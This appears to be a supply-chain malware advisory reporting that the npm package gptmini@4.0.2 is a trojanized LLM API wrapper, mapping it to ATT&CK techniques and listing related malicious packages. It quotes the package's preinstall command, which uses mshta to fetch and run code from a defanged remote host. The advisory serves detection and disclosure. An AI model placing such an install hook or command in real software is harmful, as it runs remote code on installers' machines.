gptmini@4.0.2
Malicious code in gptmini (npm)
T1195.002 · Compromise Software Supply ChainT1059 · Command and Scripting InterpreterT1218.005 · MshtaT1105 · Ingress Tool Transfer
Analysis
Package gptmini@4.0.2 is a trojanized LLM API wrapper that executes a remote downloader during installation. The preinstall hook (node preinstall.js) runs child_process.exec('cmd /c "mshta hxxp://fixars[.]top"'), which uses the Windows mshta.exe binary (a known LOLBin) to fetch and execute arbitrary code from fixars[.]top on the installer's machine. The main module appears to be a functional LLM client, masking the malicious install-time behaviour.
- analyzed by
- Leitwacht
- first seen
- Jun 26, 2026, 06:08 PM
- analyzed
- Jun 26, 2026, 06:09 PM
Related advisories
- openllmapi@4.0.2
- easyllmai@3.0.1
- leo-config@1.1.1
- chai-as-operated@6.0.3
- pino-zod@1.0.121
- web3-token-helper@1.1.3
- ts-bn-lint-helper@3.1.19
- chai-as-forgeted@9.24.6
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.